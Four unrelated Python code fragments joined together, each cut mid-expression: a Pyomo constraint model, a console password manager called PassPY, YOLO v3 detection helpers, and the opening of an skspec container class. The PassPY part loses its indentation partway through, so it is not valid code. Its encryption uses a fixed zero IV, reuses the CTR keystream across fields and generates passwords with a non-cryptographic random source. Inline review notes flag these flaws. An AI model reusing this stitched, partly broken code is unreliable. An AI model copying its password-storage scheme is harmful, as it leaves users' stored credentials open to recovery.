                          + m.b270 + m.b290 + m.b310 + m.b330 + m.b350 + m.b370 + m.b390 + m.b410 + m.b430 + m.b450
                          == 1)
m.c432 = Constraint(expr= m.b71 + m.b91 + m.b111 + m.b131 + m.b151 + m.b171 + m.b191 + m.b211 + m.b231 + m.b251
                          + m.b271 + m.b291 + m.b311 + m.b331 + m.b351 + m.b371 + m.b391 + m.b411 + m.b431 + m.b451
                          == 1)
m.c433 = Constraint(expr= m.b72 + m.b92 + m.b112 + m.b132 + m.b152 + m.b172 + m.b192 + m.b212 + m.b232 + m.b252
                          + m.b272 + m.b292 + m.b312 + m.b332 + m.b352 + m.b372 + m.b392 + m.b412 + m.b432 + m.b452
                          == 1)
m.c434 = Constraint(expr= m.b73 + m.b93 + m.b113 + m.b133 + m.b153 + m.b173 + m.b193 + m.b213 + m.b233 + m.b253
                          + m.b273 + m.b293 + m.b313 + m.b333 + m.b353 + m.b373 + m.b393 + m.b413 + m.b433 + m.b453
                          == 1)
m.c435 = Constraint(expr= m.b74 + m.b94 + m.b114 + m.b134 + m.b154 + m.b174 + m.b194 + m.b214 + m.b234 + m.b254
                          + m.b274 + m.b294 + m.b314 + m.b334 + m.b354 + m.b374 + m.b394 + m.b414 + m.b434 + m.b454
                          == 1)
m.c436 = Constraint(expr= m.b75 + m.b95 + m.b115 + m.b135 + m.b155 + m.b175 + m.b195 + m.b215 + m.b235 + m.b255
                          + m.b275 + m.b295 + m.b315 + m.b335 + m.b355 + m.b375 + m.b395 + m.b415 + m.b435 + m.b455
                          == 1)
m.c437 = Constraint(expr= m.b76 + m.b96 + m.b116 + m.b136 + m.b156 + m.b176 + m.b196 + m.b216 + m.b236 + m.b256
                          + m.b276 + m.b296 + m.b316 + m.b336 + m.b356 + m.b376 + m.b396 + m.b416 + m.b436 + m.b456
                          == 1)
m.c438 = Constraint(expr= m.b77 + m.b97 + m.b117 + m.b137 + m.b157 + m.b177 + m.b197 + m.b217 + m.b237 + m.b257
                          + m.b277 + m.b297 + m.b317 + m.b337 + m.b357 + m.b377 + m.b397 + m.b417 + m.b437 + m.b457
                          == 1)
m.c439 = Constraint(expr= m.b78 + m.b98 + m.b118 + m.b138 + m.b158 + m.b178 + m.b198 + m.b218 + m.b238 + m.b258
                          + m.b278 + m.b298 + m.b318 + m.b338 + m.b358 + m.b378 + m.b398 + m.b418 + m.b438 + m.b458
                          == 1)
m.c440 = Constraint(expr= m.b79 + m.b99 + m.b119 + m.b139 + m.b159 + m.b179 + m.b199 + m.b219 + m.b239 + m.b259
                          + m.b279 + m.b299 + m.b319 + m.b339 + m.b359 + m.b379 + m.b399 + m.b419 + m.b439 + m.b459
                          == 1)
m.c441 = Constraint(expr= m.b80 + m.b100 + m.b120 + m.b140 + m.b160 + m.b180 + m.b200 + m.b220 + m.b240 | |
import codecs
import os
import os.path
import string
import random
from random import shuffle
import csv
import time
import hashlib
import struct
import binascii
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
# Console sizing command (Windows `mode con:`; a harmless no-op elsewhere).
DefaultSize = "mode con: cols=100 lines=20"
os.system(DefaultSize)
# Data directory for password files.  NOTE(review): "\P" is not a Python
# escape sequence so this literal happens to work, but a raw string
# (r"C:\ProgramData\PassPY") would be safer against future edits.
pre = "C:\ProgramData\PassPY"
if not os.path.exists(pre):
    os.makedirs(pre)
# Module-level placeholders (not referenced in the code visible here).
account = ""
cypher = ""
username = ""
user_name = ""
m = ""
def clrscr():
    """Clear the terminal, picking the right command for the current OS."""
    # POSIX systems use `clear`; Windows (os.name == 'nt') uses `cls`.
    command = 'clear' if os.name == 'posix' else 'cls'
    _ = os.system(command)
def logo():
    """Print the PassPY ASCII-art banner."""
    banner = "________ __________ __\n___ __ \_____ _________________ __ \ \/ /\n__ /_/ / __ `/_ ___/_ ___/_ /_/ /_ / \n_ ____// /_/ /_(__ )_(__ )_ ____/_ / \n/_/ \__,_/ /____/ /____/ /_/ /_/ \n\n\n\n\n"
    print(banner)
def header():
    """Reset the screen: clear it, re-apply the window size, show the banner."""
    clrscr()
    os.system(DefaultSize)
    logo()
def PassGen(user_name,acc,uN,pre):
    """Create a password for account *acc* / login *uN* and store it encrypted.

    Offers either a random generated password of a chosen length or a typed
    one, then encrypts account, username, and password with AES-CTR and
    appends the record to ``<pre>/<user_name>50.passpy``.

    SECURITY NOTE(review): the IV is all-zero (``bytes(16)``) and a fresh
    encryptor is created from the *same* Cipher (same key + IV) for each of
    uN, acc, and pW — so all three fields are XORed with the identical CTR
    keystream.  That is keystream reuse; confirm whether this matches the
    decryption side before changing, but it should be redesigned.
    """
    header()
    x = ''
    x = input("1: Have PassPY generate a password with a length you choose for " + acc + "\n2: Type your own password for " + acc + "\n")
    if x == '1':
        header()
        length = float(input("How many characters would you like the password to be for " + acc + "? \n"))
        # Split the requested length into thirds: letters, digits, punctuation
        # (punctuation absorbs the remainder).
        div = int(length/3)
        r = int(length%3)
        seed = string.ascii_letters  # letters pool
        letters = ( ''. join(random.choice(seed) for i in range(div)) )
        seed = string.digits  # digits pool
        numbers = ( ''.join(random.choice(seed) for i in range(div)) )
        seed = string.punctuation  # punctuation pool
        punctuation = ( ''.join(random.choice(seed) for i in range(div + r)) )
        hold = letters + numbers + punctuation
        # Shuffle so character classes are not grouped.
        # NOTE(review): `random` is not a CSPRNG; `secrets` would be the
        # appropriate module for password generation.
        pW = ( ''.join(random.sample(hold, len(hold))))
        print("here is the generated password: " + pW)
        # Key derivation: sha256(user_name) hex + sha256(acc+uN+pW) hex,
        # hashed again; the 32-byte digest is the AES key.
        preKey = acc + uN + pW
        lineHash = hashlib.sha256(preKey.encode('utf-8'))
        half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
        lineHashHexidecimal = lineHash.hexdigest()
        smosh = hashlib.sha256(bytes(half + lineHashHexidecimal, 'utf8'))
        key = smosh.digest()
        # 16 zero bytes (half the 32-byte key length) — a fixed IV; see the
        # security note in the docstring.
        iv = bytes(int(len(key)/2))
        acc = bytes(acc, 'utf8')
        uN = bytes(uN, 'utf8')
        pW = bytes(pW, 'utf8')
        cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
        # Each encryptor restarts the CTR keystream at the same counter.
        encryptor = cipher.encryptor()
        uN = encryptor.update(uN) + encryptor.finalize()
        uN = bytes.hex(uN)
        encryptor = cipher.encryptor()
        acc = encryptor.update(acc) + encryptor.finalize()
        acc = bytes.hex(acc)
        encryptor = cipher.encryptor()
        pW = encryptor.update(pW) + encryptor.finalize()
        pW = bytes.hex(pW)
        # Integrity checksum over the hex-encoded ciphertext fields.
        lineEncrypted = bytes(acc + uN + pW, 'utf8')
        lineChecksum = hashlib.sha256(lineEncrypted).hexdigest()
        newline = acc + "\t" + uN + "\t" + pW + "\t" + str(lineHashHexidecimal) + "\t" + str(lineChecksum) + "\n"
        post = user_name + "50" + ".passpy"
        location = os.path.join(pre, post)
        with open(location, "a", newline="\n") as filea:
            filea.write(newline + "\n")
        input("press Enter once the password is memorized (dont worry if you forget, it was saved in your password directory.)\n")
        # NOTE(review): MainMenu is not defined in the code visible here.
        MainMenu(user_name)
    elif x == '2':
        header()
        pW = input("Type the password for " + acc + ", then press Enter: \n")
        # Same derivation + encryption scheme as branch '1' above.
        preKey = acc + uN + pW
        lineHash = hashlib.sha256(preKey.encode('utf-8'))
        half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
        lineHashHexidecimal = lineHash.hexdigest()
        smosh = hashlib.sha256(bytes(half + lineHashHexidecimal, 'utf8'))
        key = smosh.digest()
        iv = bytes(int(len(key)/2))
        acc = bytes(acc, 'utf8')
        uN = bytes(uN, 'utf8')
        pW = bytes(pW, 'utf8')
        cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
        # Clearing these locals; the cipher object still holds the key.
        smosh = ''
        key = ''
        iv = ''
        encryptor = cipher.encryptor()
        uN = encryptor.update(uN) + encryptor.finalize()
        uN = bytes.hex(uN)
        encryptor = cipher.encryptor()
        acc = encryptor.update(acc) + encryptor.finalize()
        acc = bytes.hex(acc)
        encryptor = cipher.encryptor()
        pW = encryptor.update(pW) + encryptor.finalize()
        pW = bytes.hex(pW)
        lineEncrypted = bytes(acc + uN + pW, 'utf8')
        lineChecksum = hashlib.sha256(lineEncrypted).hexdigest()
        newline = acc + "\t" + uN + "\t" + pW + "\t" + str(lineHashHexidecimal) + "\t" + str(lineChecksum) + "\n"
        post = user_name + "50" + ".passpy"
        location = os.path.join(pre, post)
        with open(location, "a", newline="\n") as filea:
            filea.write(newline)
        MainMenu(user_name)
    else:
        # Invalid menu choice: re-prompt.
        PassGen(user_name,acc,uN,pre)
def Signin(pre):
    """Prompt for a username and password, verify them against the stored
    credential file, and enter the main menu on success.

    Parameters:
        pre -- directory path holding the per-user *.passpy files.

    Side effects: reads "<hexname>4c.passpy", prompts on stdin, and recurses
    into Signin/Login/MainMenu depending on the outcome.
    """
    header()
    # Usernames are stored hex-encoded so they are filesystem-safe.
    user_name = input("Enter Username: ").encode("utf-8").hex()
    if user_name == "":
        input("Press enter to return to the Sign In screen and enter a user name\n")
        Signin(pre)
        return  # don't fall through into the lookup with an empty name
    nametest2 = user_name + "4c" + ".passpy"
    location = os.path.join(pre, nametest2)
    try:  # check to see if the account exists
        # 'with' guarantees the credential file is closed even if a later
        # line raises (the original left the handle open).
        with open(location, "r") as usersearch:  # search for user's password file
            lst = list(usersearch.readlines())
        confirm = lst[-1]  # last line holds the stored login record
        print("Hello " + str(codecs.decode(user_name, "hex"), "utf-8"))
        password = input("Enter Password: ").encode("utf-8").hex()
        s(user_name, password)
        # NOTE(review): 'line' is not defined in this function -- it appears
        # to be a module-level value produced by s(); confirm before relying
        # on this comparison.
        compare = line
        if compare == confirm:
            print("Access Granted")
            MainMenu(user_name)
        else:
            print("Access Denied")
            Signin(pre)
    except FileNotFoundError:
        header()
        print("Username not found!")
        input("please press enter to continue")
        Login(pre)
def AddEntry(user_name, pre):
    """Ask for an account name and its username, then hand control to
    PassGen to create and store the password entry."""
    header()
    account = input("what account is this password for? (e.g. GitHub)\n")
    account_user = input("What is the username for " + account + "?\n")
    PassGen(user_name, account, account_user, pre)
    print("Done!")
def PasswordSearch(user_name,pre):
c = ""
header()
post = user_name + "50" + ".passpy"
location = os.path.join(pre, post)
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
SearchColumn = input("Password Search Menu:\nPress 1 to show all passwords\nPress 2 to search by account\nAll of the following options will NOT work!\nPress 3 to search by username\nPress 4 to search by password\nPress 5 to return to the Main Menu\n ")
try: #make sure there is a password file to search through
with open(location) as csv_file:
csv_reader = csv.reader(csv_file, delimiter="\t")
next(csv_reader)
if SearchColumn == '1':
header()
print("Here are all of the stored passwords: ")
for row in csv_reader: # !!!START HERE!!! Decrypt single item line by line
smosh = hashlib.sha256(bytes(half + str(row[3]), 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
decryptor = cipher.decryptor()
bEntry = bytes.fromhex(str(row[2]).lower())
bct = str(decryptor.update(bEntry), "utf8")
print(bct)
input("Press Enter to continue to the Main Menu")
MainMenu(user_name)
elif SearchColumn == '2':
header()
search = bytes(input("What Account are you looking for? \n"), 'utf8')
for row in csv_reader:
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
smosh = hashlib.sha256(bytes(half + str(row[3]), 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
decryptor = cipher.decryptor()
encryptor = cipher.encryptor()
sup = encryptor.update(search) + encryptor.finalize()
sable = bytes.hex(sup)
if sable == row[0]:
decryptor = cipher.decryptor()
a = bytes.fromhex(str(row[0]).lower())
a = str(decryptor.update(a), "utf8")
decryptor = cipher.decryptor()
u = bytes.fromhex(str(row[1]).lower())
u = str(decryptor.update(u), "utf8")
decryptor = cipher.decryptor()
p = bytes.fromhex(str(row[2]).lower())
p = str(decryptor.update(p), "utf8")
header()
c = input("The Account, Username and Password information for " + a + " are:\n\nAccount------" + a + "\nUser Name----" + u + "\nPassword-----" + p + "\n\nEnter 1 if you want to copy the password to the clipboard\nEnter 2 if you want to continue searching\n")
if c == '1':
target = p
header()
print("The Account, Username and Password information for " + a + " are:\n\nAccount------" + a + "\nUser Name----" + u + "\nPassword-----" + p + "\n")
Clipboard(target)
MainMenu(user_name)
elif c == '2':
print("Password NOT copied, continuing to search")
time.sleep(2)
continue
else:
print("Returning to the Main Menu")
time.sleep(1)
MainMenu(user_name)
MainMenu(user_name)
elif SearchColumn == '3':
header()
search = bytes(input("What Username are you looking for? \n"), 'utf8')
for row in csv_reader:
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
smosh = hashlib.sha256(bytes(half + str(row[3]), 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
decryptor = cipher.decryptor()
encryptor = cipher.encryptor()
sup = encryptor.update(search) + encryptor.finalize()
sable = bytes.hex(sup)
if sable == row[1]:
decryptor = cipher.decryptor()
a = bytes.fromhex(str(row[0]).lower())
a = str(decryptor.update(a), "utf8")
decryptor = cipher.decryptor()
u = bytes.fromhex(str(row[1]).lower())
u = str(decryptor.update(u), "utf8")
decryptor = cipher.decryptor()
p = bytes.fromhex(str(row[2]).lower())
p = str(decryptor.update(p), "utf8")
header()
c = input("The Account, Username and Password information for " + a + " are:\n\nAccount------" + a + "\nUser Name----" + u + "\nPassword-----" + p + "\n\nEnter 1 if you want to copy the password to the clipboard\nEnter 2 if you do not\n")
if c == '1':
target = p
header()
print("The Account, Username and Password information for " + a + " are:\n\nAccount------" + a + "\nUser Name----" + u + "\nPassword-----" + p + "\n")
Clipboard(target)
MainMenu(user_name)
elif c == '2':
input("Password NOT copied, Press enter to return to continue searching")
continue
else:
input("Password NOT copied, Press enter to return to the Main Menu")
MainMenu(user_name)
continue
MainMenu(user_name)
elif SearchColumn == '4':
header()
search = bytes(input("What password are you looking for? \n"), 'utf8')
for row in csv_reader:
half = hashlib.sha256(user_name.encode('utf-8')).hexdigest()
smosh = hashlib.sha256(bytes(half + str(row[3]), 'utf8'))
key = smosh.digest()
iv = bytes(int(len(key)/2))
cipher = Cipher(algorithms.AES(key), modes.CTR(iv))
decryptor = cipher.decryptor()
encryptor = cipher.encryptor()
sup = encryptor.update(search) + encryptor.finalize()
sable = bytes.hex(sup)
if sable == row[2]:
decryptor = cipher.decryptor()
a = bytes.fromhex(str(row[0]).lower())
a = str(decryptor.update(a), "utf8")
decryptor = cipher.decryptor()
u = | |
from __future__ import division
import torch
import math
import argparse
import time
from torch.autograd import Variable
from PIL import ImageDraw
def detect_arg_parse():
    """
    Parse command-line arguments for the detect module.

    Numeric options carry explicit ``type=`` converters so values supplied on
    the command line arrive as int/float instead of raw strings (argparse
    only uses the default's type when the flag is omitted).

    :return: argparse.Namespace with the parsed options.
    """
    parser = argparse.ArgumentParser(description='YOLO v3 Detection Module')
    arg = parser.add_argument
    arg('--images', dest='images', help='Image / Directory containing images need to be detected',
        default='data/images/dog.jpg', type=str)
    arg('--det', dest='det', help='Image / Directory to store the detection result.',
        default='data/results/predict.jpg', type=str)
    arg('--batch_size', dest='batch_size', default=1, type=int)
    arg('--confidence', dest='confidence', help='The lowest confidence to perform a detection',
        default=0.5, type=float)
    arg('--nms_thresh', dest='nms_thresh', help='NMS Threshold', default=0.4, type=float)
    arg('--cfg', dest='cfgfile', help='Model configuration file', default='data/cfg/yolov3.cfg', type=str)
    arg('--weights', dest='weightsfile', help='Model weights file', default='data/weights/yolov3.weights', type=str)
    arg('--reso', dest='reso', help='Input resolution of the model.', default='416', type=str)
    arg('--scales', dest='scales', help='Scales to use for detection', default='1,2,3', type=str)
    arg('--gpu', dest='gpu', help='Number of the gpu you want to use', default=-1, type=int)
    arg('--name_file', dest='name_file', help='The file of class names', default='data/names/coco.names', type=str)
    return parser.parse_args()
def load_class_names(namesfile):
    """Read class names from *namesfile*, one per line, and return them as a
    list with trailing whitespace stripped."""
    with open(namesfile, 'r') as fp:
        return [line.rstrip() for line in fp.readlines()]
def plot_boxes(img, boxes, save_name=None, class_names=None):
    """Draw detection boxes (and class labels, when available) on a PIL image.

    Parameters
    ----------
    img : PIL image
        Image to draw on (modified in place via ImageDraw).
    boxes : iterable
        Each box is [cx, cy, w, h, ...] with coordinates scaled by the image
        width/height below (i.e. fractions of the image size). Boxes of
        length 7 additionally carry class confidence at index 5 and class id
        at index 6.
    save_name : str, optional
        If given, the annotated image is also written to this path.
    class_names : list of str, optional
        Index-to-name mapping used for labels and per-class colors.

    Returns
    -------
    The same image object, after drawing.
    """
    # Six anchor colors; per-class colors are interpolated between them.
    colors = torch.FloatTensor([[1, 0, 1], [0, 0, 1], [0, 1, 1], [0, 1, 0], [1, 1, 0], [1, 0, 0]])
    def get_color(c, x, max_val):
        # Linearly interpolate channel c between two neighboring anchor colors.
        ratio = float(x) / max_val * 5
        i = int(math.floor(ratio))
        j = int(math.ceil(ratio))
        ratio = ratio - i
        r = (1 - ratio) * colors[i][c] + ratio * colors[j][c]
        return int(r * 255)
    width = img.width
    height = img.height
    draw = ImageDraw.Draw(img)
    for box in boxes:
        # Convert center/size form to absolute corner coordinates.
        x1 = (box[0] - box[2] / 2.0) * width
        y1 = (box[1] - box[3] / 2.0) * height
        x2 = (box[0] + box[2] / 2.0) * width
        y2 = (box[1] + box[3] / 2.0) * height
        rgb = (255, 0, 0)  # default color when no class info is present
        if len(box) == 7 and class_names:
            cls_conf = box[5]
            cls_id = box[6]
            print('%s: %f' % (class_names[cls_id], cls_conf))
            classes = len(class_names)
            # Scatter class ids across the palette so nearby ids get distinct colors.
            offset = cls_id * 123457 % classes
            red = get_color(2, offset, classes)
            green = get_color(1, offset, classes)
            blue = get_color(0, offset, classes)
            rgb = (red, green, blue)
            draw.text((x1, y1), class_names[cls_id], fill=rgb)
        draw.rectangle([x1, y1, x2, y2], outline=rgb)
    if save_name:
        print('save plt results to %s' % save_name)
        img.save(save_name)
    return img
def nms(boxes, nms_thresh):
    """Greedy non-maximum suppression.

    Boxes are visited in order of decreasing detection confidence (box[4]);
    each kept box suppresses later, overlapping boxes (IoU > nms_thresh) by
    zeroing their confidence in place. Returns the list of surviving boxes.
    """
    if not boxes:
        return boxes
    # Sorting ascending by (1 - conf) is descending by confidence.
    inv_confs = torch.zeros(len(boxes))
    for pos, box in enumerate(boxes):
        inv_confs[pos] = 1 - box[4]
    _, order = torch.sort(inv_confs)
    kept = []
    for pos in range(len(boxes)):
        candidate = boxes[order[pos]]
        if candidate[4] > 0:
            kept.append(candidate)
            for later in range(pos + 1, len(boxes)):
                other = boxes[order[later]]
                if bbox_iou(candidate, other, x1y1x2y2=False) > nms_thresh:
                    other[4] = 0  # suppressed
    return kept
def bbox_iou(box1, box2, x1y1x2y2=True):
    """Intersection-over-union of two boxes.

    With x1y1x2y2=True each box is (x1, y1, x2, y2); otherwise each box is
    (cx, cy, w, h). Returns 0.0 when the boxes do not overlap.
    """
    if x1y1x2y2:
        left1, top1, right1, bottom1 = box1[0], box1[1], box1[2], box1[3]
        left2, top2, right2, bottom2 = box2[0], box2[1], box2[2], box2[3]
    else:
        left1 = box1[0] - box1[2] / 2.0
        right1 = box1[0] + box1[2] / 2.0
        top1 = box1[1] - box1[3] / 2.0
        bottom1 = box1[1] + box1[3] / 2.0
        left2 = box2[0] - box2[2] / 2.0
        right2 = box2[0] + box2[2] / 2.0
        top2 = box2[1] - box2[3] / 2.0
        bottom2 = box2[1] + box2[3] / 2.0
    w1, h1 = right1 - left1, bottom1 - top1
    w2, h2 = right2 - left2, bottom2 - top2
    # Width/height of the bounding hull of both boxes.
    hull_w = max(right1, right2) - min(left1, left2)
    hull_h = max(bottom1, bottom2) - min(top1, top2)
    # Overlap extent derives from total size minus hull size.
    inter_w = w1 + w2 - hull_w
    inter_h = h1 + h2 - hull_h
    if inter_w <= 0 or inter_h <= 0:
        return 0.0
    inter_area = inter_w * inter_h
    union_area = w1 * h1 + w2 * h2 - inter_area
    return inter_area / union_area
def bbox_ious(boxes1, boxes2, x1y1x2y2=True):
    """Vectorized IoU between paired boxes.

    boxes1/boxes2 are tensors indexed [coord][n]: rows 0-3 are either
    (x1, y1, x2, y2) when x1y1x2y2=True or (cx, cy, w, h) otherwise.
    Returns a tensor of IoU values; non-overlapping pairs get 0.
    """
    if x1y1x2y2:
        w1 = boxes1[2] - boxes1[0]
        h1 = boxes1[3] - boxes1[1]
        w2 = boxes2[2] - boxes2[0]
        h2 = boxes2[3] - boxes2[1]
        hull_w = torch.max(boxes1[2], boxes2[2]) - torch.min(boxes1[0], boxes2[0])
        hull_h = torch.max(boxes1[3], boxes2[3]) - torch.min(boxes1[1], boxes2[1])
    else:
        w1, h1 = boxes1[2], boxes1[3]
        w2, h2 = boxes2[2], boxes2[3]
        hull_w = (torch.max(boxes1[0] + w1 / 2.0, boxes2[0] + w2 / 2.0)
                  - torch.min(boxes1[0] - w1 / 2.0, boxes2[0] - w2 / 2.0))
        hull_h = (torch.max(boxes1[1] + h1 / 2.0, boxes2[1] + h2 / 2.0)
                  - torch.min(boxes1[1] - h1 / 2.0, boxes2[1] - h2 / 2.0))
    inter_w = w1 + w2 - hull_w
    inter_h = h1 + h2 - hull_h
    # Pairs with no overlap in either dimension contribute zero intersection.
    no_overlap = ((inter_w <= 0) + (inter_h <= 0) > 0)
    inter_area = inter_w * inter_h
    inter_area[no_overlap] = 0
    union_area = w1 * h1 + w2 * h2 - inter_area
    return inter_area / union_area
def parse_cfg(cfgfile):
    """Parse a darknet .cfg file into a list of block dicts.

    Each '[section]' header starts a new dict with its name under 'type'
    ('type' keys inside a section are renamed '_type' to avoid clobbering).
    Convolutional blocks get a 'batch_normalize' default of 0. Blank lines
    and '#' comments are skipped. Values are kept as strings.
    """
    blocks = []
    block = None
    # 'with' guarantees the file is closed even if a malformed line raises.
    with open(cfgfile) as fp:
        for line in fp:
            line = line.rstrip()
            if line == '' or line[0] == '#':
                continue
            elif line[0] == '[':
                if block:
                    blocks.append(block)
                block = dict()
                block['type'] = line.lstrip('[').rstrip(']')
                if block['type'] == 'convolutional':
                    block['batch_normalize'] = 0
            else:
                # Split on the first '=' only, so values containing '=' survive.
                key, value = line.split('=', 1)
                key = key.strip()
                if key == 'type':
                    key = '_type'
                block[key] = value.strip()
    if block:
        blocks.append(block)
    return blocks
def print_cfg(blocks):
    """Pretty-print a parsed darknet config (see parse_cfg) as a layer table.

    Tracks the running output width/height/filter count of every layer so
    later layers (route/shortcut) can look up their input shapes. Print-only;
    the blocks list is not modified.
    """
    print('layer filters size input output')
    prev_width = 416
    prev_height = 416
    prev_filters = 3
    out_filters = []
    out_widths = []
    out_heights = []
    ind = -2
    for block in blocks:
        ind = ind + 1
        if block['type'] == 'net':
            prev_width = int(block['width'])
            prev_height = int(block['height'])
            continue
        elif block['type'] == 'convolutional':
            filters = int(block['filters'])
            kernel_size = int(block['size'])
            stride = int(block['stride'])
            is_pad = int(block['pad'])
            pad = (kernel_size - 1) / 2 if is_pad else 0
            width = (prev_width + 2 * pad - kernel_size) / stride + 1
            height = (prev_height + 2 * pad - kernel_size) / stride + 1
            print('%5d %-6s %4d %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'conv', filters, kernel_size, kernel_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
            prev_width = int(width)
            prev_height = int(height)
            prev_filters = filters
        elif block['type'] == 'maxpool':
            pool_size = int(block['size'])
            stride = int(block['stride'])
            # Pooling keeps the channel count: use prev_filters instead of
            # the stale 'filters' left over from an earlier conv block (the
            # original raised NameError when maxpool appeared first).
            filters = prev_filters
            width = int(prev_width / stride)
            height = int(prev_height / stride)
            print('%5d %-6s %d x %d / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'max', pool_size, pool_size, stride, prev_width, prev_height, prev_filters, width, height, filters))
            prev_width = width
            prev_height = height
            prev_filters = filters
        elif block['type'] == 'avgpool':
            # Global average pooling collapses spatial dims, keeps channels
            # (the original overwrote prev_filters with a stale 'filters').
            prev_width = 1
            prev_height = 1
            print('%5d %-6s %3d x %3d x%4d -> %3d' % (ind, 'avg', prev_width, prev_height, prev_filters, prev_filters))
        elif block['type'] == 'softmax':
            print('%5d %-6s -> %3d' % (ind, 'softmax', prev_filters))
        elif block['type'] == 'cost':
            print('%5d %-6s -> %3d' % (ind, 'cost', prev_filters))
        elif block['type'] == 'reorg':
            stride = int(block['stride'])
            # Reorg trades spatial resolution for channels.
            filters = stride * stride * prev_filters
            width = int(prev_width / stride)
            height = int(prev_height / stride)
            print('%5d %-6s / %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'reorg', stride, prev_width, prev_height, prev_filters, width, height, filters))
            prev_width = width
            prev_height = height
            prev_filters = filters
        elif block['type'] == 'upsample':
            stride = int(block['stride'])
            width = prev_width * stride
            height = prev_height * stride
            print('%5d %-6s * %d %3d x %3d x%4d -> %3d x %3d x%4d' % (ind, 'upsample', stride, prev_width, prev_height, prev_filters, width, height, prev_filters))
            prev_width = width
            prev_height = height
        elif block['type'] == 'route':
            layers = block['layers'].split(',')
            # Negative layer indices are relative to the current layer.
            layers = [int(i) if int(i) > 0 else int(i) + ind for i in layers]
            if len(layers) == 1:
                print('%5d %-6s %d' % (ind, 'route', layers[0]))
                prev_width = out_widths[layers[0]]
                prev_height = out_heights[layers[0]]
                prev_filters = out_filters[layers[0]]
            elif len(layers) == 2:
                print('%5d %-6s %d %d' % (ind, 'route', layers[0], layers[1]))
                prev_width = out_widths[layers[0]]
                prev_height = out_heights[layers[0]]
                assert (prev_width == out_widths[layers[1]])
                assert (prev_height == out_heights[layers[1]])
                # Concatenation along channels: filter counts add.
                prev_filters = out_filters[layers[0]] + out_filters[layers[1]]
        elif block['type'] in ['region', 'yolo']:
            print('%5d %-6s' % (ind, 'detection'))
        elif block['type'] == 'shortcut':
            from_id = int(block['from'])
            from_id = from_id if from_id > 0 else from_id + ind
            print('%5d %-6s %d' % (ind, 'shortcut', from_id))
            prev_width = out_widths[from_id]
            prev_height = out_heights[from_id]
            prev_filters = out_filters[from_id]
        elif block['type'] == 'connected':
            filters = int(block['output'])
            print('%5d %-6s %d -> %3d' % (ind, 'connected', prev_filters, filters))
            # Fully-connected output has no spatial extent.
            prev_width = 1
            prev_height = 1
            prev_filters = filters
        else:
            print('unknown type %s' % (block['type']))
            continue  # unknown layers record no output shape
        # Record this layer's output shape for later route/shortcut lookups.
        out_widths.append(prev_width)
        out_heights.append(prev_height)
        out_filters.append(prev_filters)
def load_conv(buf, start, conv_model):
    """Copy darknet-serialized conv weights from a flat numpy buffer into a
    torch conv module.

    Layout in *buf* (starting at offset *start*): bias values first, then
    the weight values in the module's natural (out, in, kh, kw) order.

    Returns the offset just past the consumed values, so calls can be
    chained across layers.
    """
    num_w = conv_model.weight.numel()
    num_b = conv_model.bias.numel()
    conv_model.bias.data.copy_(torch.from_numpy(buf[start:start + num_b]))
    start = start + num_b
    # Reshape the flat slice to the weight's own shape; copy_ does not
    # accept a flat tensor of matching numel directly.
    conv_model.weight.data.copy_(
        torch.from_numpy(buf[start:start + num_w]).reshape(conv_model.weight.shape))
    start = start + num_w
    return start
def | |
<gh_stars>10-100
""" Storage class for sets of pandas object. Similar to a panel,
but does inherently store 3d data. Data can be converted to 3d through
methods, but otherwise is just a container."""
from collections import OrderedDict, Iterable
from copy import deepcopy
import logging
from skspec.logger import logclass
from skspec.plotting.multiplots import slice_plot
import skspec.core.utilities as put
logger = logging.getLogger(__name__)
class MultiError(Exception):
    """Module-specific exception for Stack/SpecStack operations (defined
    here for callers; not raised in this file's visible code)."""
def mem_address(obj):
    """ Return memory address string for a python object. Object must have
    default python object __repr__ (ie it would look something like:
    <pyparty.tools.grids.CartesianGrid object at 0x3ba2fb0>
    The address is merely returned by string parsing. """
    try:
        out = obj.__repr__().split()[-1]
    except Exception as E:
        # '%s' % E works on both py2 and py3; the old 'E.message' attribute
        # was removed in Python 3.
        raise Exception("Failed to return memory address by string parsing. "
                        "Recieved following message: %s" % E)
    else:
        # Trim the trailing '>' (and any quoting) off the repr tail.
        return out.strip("'").strip('>')
@logclass(log_name=__name__, public_lvl='debug')
class Stack(object):
    """ Base class to store pandas objects, with special operations to
    return as 3d data (eg panel) and to apply functions itemwise. Items are
    stored in an ordered dict.

    Construction accepts a dict, a zipped (key, object) iterable, a plain
    iterable of objects (keys auto-generated from itemlabel), or a single
    object. Dictionary-style access, length and iteration are delegated to
    the underlying OrderedDict in self._data.
    """
    # Label used when item keys must be auto-generated (Item0, Item1, ...).
    itemlabel = 'Item'
    # Dunder names that are deferred to the underlying OrderedDict (see the
    # __len__/__iter__/__reversed__/__contains__ wrappers below).
    _magic=['__len__',
            '__iter__',
            '__reversed__',
            '__contains__',
            ]
    def __init__(self, data, keys=None, name='', sort_items=False):
        """Store *data* as an OrderedDict keyed by *keys* (or generated keys).

        Parameters: data -- dict, iterable of (key, obj) pairs, iterable of
        objects, or a single object; keys -- optional explicit keys (must
        match len(data)); name -- display name; sort_items -- sort dict keys.
        """
        self.name = name
        # Dictionary input
        if isinstance(data, dict):
            logger.debug('Initializing "%s" from dictionary.' % self.full_name)
            if sort_items:
                logger.debug('Sorting keys')
                # NOTE(review): sorted(data.keys(), ...) yields bare keys,
                # not (key, value) pairs -- presumably data.items() was
                # intended here; confirm before relying on sort_items=True.
                self._data=OrderedDict(sorted(data.keys(), key=lambda t: t[0]))
            else:
                self._data=OrderedDict(data)
        else:
            if not isinstance(data, Iterable):
                logger.info('%s constructed from non-iterable... converting '
                            'data to an iterable' % self.full_name)
                data=[data]
